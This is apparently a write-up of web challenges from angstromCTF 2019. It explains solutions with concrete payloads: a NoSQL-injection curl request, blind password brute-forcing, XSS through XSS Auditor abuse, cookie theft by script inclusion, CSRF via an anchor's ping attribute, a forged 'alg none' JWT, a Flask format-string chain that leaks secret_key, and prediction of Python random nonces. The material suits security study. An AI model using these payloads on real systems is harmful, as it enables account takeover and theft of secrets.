The flag was in the source code of the webpage actf{control_u_so_we_can't_control_you}
This was a basic NoSQL Injection task.
curl -i https://nosequels.2019.chall.actf.co/login \
-H 'Content-type: application/json' \
-d '{"username": "admin", "password": {"$gt": "a"}}' \
-H 'Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRoZW50aWNhdGVkIjpmYWxzZSwiaWF0IjoxNTU1NzE4OTc5fQ.-YQh71DMt2mRIwKmgAKIB16rliriYF4dSilCsYo84-8'
After executing the above command we get a session cookie for the admin and when visiting the https://nosequels.2019.chall.actf.co/site
we get the flag.
This was the same task as before but here we had to use blind NoSQL injection in order to fetch all of the pasword's characters by using the payload above. E.g.
{"username": "admin", "password": {"$gt": "a"}} -> true
{"username": "admin", "password": {"$gt": "z"}} -> false
By bruteforcing all characters we get the password congratsyouwin
and then the flag: actf{still_no_sql_in_the_sequel}
Solving script: ./NoSequels2/solve.py
Detailed writeup available here: https://medium.com/@terjanq/xss-auditor-the-protector-of-unprotected-f900a5e15b7b
We had a simple upload page that allowed you to upload a custom HTML page. You could report suspicious URLs to admin. After uploading the page we get:
<!DOCTYPE html SYSTEM "3b16c602b53a3e4fc22f0d25cddb0fc4d1478e0233c83172c36d0a6cf46c171ed5811fbffc3cb9c3705b7258179ef11362760d105fb483937607dd46a6abcffc">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/skeleton/2.0.4/skeleton.min.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/sha512.js"></script>
<script src="../scripts/DOMValidator.js"></script>
The <script>alert('pwned')</script>
won't be executed because of the DOMValidator.js
function checksum (element) {
var string = ''
string += (element.attributes ? element.attributes.length : 0) + '|'
for (var i = 0; i < (element.attributes ? element.attributes.length : 0); i++) {
string += element.attributes[i].name + ':' + element.attributes[i].value + '|'
string += (element.childNodes ? element.childNodes.length : 0) + '|'
for (var i = 0; i < (element.childNodes ? element.childNodes.length : 0); i++) {
string += checksum(element.childNodes[i]) + '|'
return CryptoJS.SHA512(string).toString(CryptoJS.enc.Hex)
var request = new XMLHttpRequest()
request.open('GET', location.href, false)
if (checksum((new DOMParser()).parseFromString(request.responseText, 'text/html')) !== document.doctype.systemId) {
It calculates some sort document's hash and then compares it with the original. I haven't even looked into the code because I already knew an unintended solution for this one.
The page wasn't setting any X-XSS-Protection
header so the XSS-Auditor
in Chrome 74 (that's the version the admin uses) is set to mode=filter
so any reflected XSS will be filtered and not executed.
So I appended the xss=<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/sha512.js">
parameter to the query so the sha512.js
script will be filtered and the DOMValidator.js
will crash. Hence, <script>alert('pwned')</script>
will be executed.
After sending that URL to the admin we get the flag: actf{its_all_relative}
Once again, we've got a simple webpage with URL reporting functionality. After a quick inspection we see two endpoints /getflag
and /cookies
. When visiting /cookies
our cookies
are being displayed and it looks like user_DE7aL1xDCe3BauCWqSVqg_0C5bu2078UgQHIqYsF2h0= 311
. That's a valid variable in JavaScript so by including this script on the prepared website
<script src='https://cookiemonster.2019.chall.actf.co/cookies'></script>
and then reading the window variable
var name = Object.getOwnPropertyNames(window).filter(x=>x.indexOf('admin')!=-1)[0];
we get the admin's cookie admin_GgxUa7MQ7UVo5JHFGLbqzuQfFFy4EDQNwZWAWJXS5_o=
and then the flag: actf{defund_is_the_real_cookie_monster}
We have a website where we can:
URL GET /redirect
POST /admin/changepass
POST /report
The website is not protected by any CSRF tokens but the SameSite=Lax
cookie is set so we can't do any POST
requests across different origins.
if ($path === '/admin/changepass' && $_SERVER['REQUEST_METHOD'] === 'POST' && $_SESSION["admin"] === "true") {
if (strlen($_REQUEST['password']) >= 100 && count(array_unique(str_split($_REQUEST['password']))) > 10) {
$password = $_REQUEST['password'];
echo 'Successfully changed password.';
} else {
echo 'Password is insecure.';
file_put_contents("password", $password);
In order to get the flag we have to somehow change the admin's password. We can see that it must be a POST
request but the password
can be passed as a URL parameter.
In the /redirect
we have a vulnerable code:
Click on <a href=<?php echo htmlspecialchars($_REQUEST['url']); ?>>this link</a> to go to your page!
In theory we could insert the xss there, like for example: <a href=aa onclick=alert()>this link</a>
but CSP will block such attempts because of the
Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline';
However, there is a ping
feature in <a>
elements that sends a POST
request when the link was clicked. So we can insert <a href=aa ping="/admin/changepass?password=LONG_PASSWORD">this link</a>
in the /redirect
and then when the admin clicks on that URL their password will change. The full payload:
After that we can log in using the new credentials and we get the flag: actf{p1ng_p0ng_9b05891fa9c3bed74d02a349877b1c60}
The chalange is about hacking the JWT cookie. To get the flag we have to pass this check:
let sid = JSON.parse(Buffer.from(cookie.split(".")[1], 'base64').toString()).secretid;
if(sid==undefined||sid>=secrets.length||sid<0){throw "invalid sid"}
let decoded = jwt.verify(cookie, secrets[sid]);
res.locals.flag = true;
where the secrets
is an array containing randomly generated secrets
let secret = crypto.randomBytes(32)
cookie = jwt.sign({perms:"user",secretid:secrets.length,rolled:res.locals.rolled?"yes":"no"}, secret, {algorithm: "HS256"});
The cookie looks like:
"alg": "HS256",
"typ": "JWT"
"perms": "user",
"secretid": 1394,
"rolled": "no",
"iat": 1555925889
By providing the cookie: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJwZXJtcyI6ImFkbWluIiwic2VjcmV0aWQiOiJyYW5kb21zdHIiLCJyb2xsZWQiOiJubyJ9.
which after decoding looks like
"typ": "JWT",
"alg": "none"
"perms": "admin",
"secretid": "randomstr",
"rolled": "no"
we will get the flag, becasue secrets["randomstr"]
will return undefined
and we set the algorithm
to none
The flag is: actf{defund_ate_the_cookies_and_left_no_sign}
In the challenge we could insert a template string that will be interpreted in Python's "".format(args=request.args)
function. So the string {args}
will return ImmutableMultiDict([])
. The goal was to read app.secret_key
By running the server locally and using the script from https://github.com/PequalsNP-team/pequalsnp-team.github.io/blob/master/assets/search.py, I found out the chain of properties that led to Flask.app
object {args.__class__.__weakref__.__objclass__._iter_hashitems.__globals__[__loader__].__class__.__weakref__.__objclass__.get_data.__globals__[__loader__].exec_module.__globals__[__builtins__][__build_class__].__self__.copyright.__class__._Printer__setup.__globals__[sys].modules[flask].current_app.secret_key}
And the flag is: actf{traversed_the_world_and_the_seven_seas}
Solving script: ./Madlibbin/app.py $ python3 -m flask run
It was a basic task for cracking the Python's random
generator. The solution was to request enough nonces
from https://naas.2019.chall.actf.co/nonceify
to predict the upcoming ones. To crack the random
generator I used the tool: https://github.com/tna0y/Python-random-module-cracker.
After successful prediction of the nonces you only had to create a paste with <script nonce=Nonce1></script><script nonce=Nonce2></script><script nonce=Nonce3></script>...
so you can be sure that when the admin visits the page one of them will work.
After getting the admin's cookie we get the flag: actf{lots_and_lots_of_nonces}
Solving script: ./NaaS/solve.py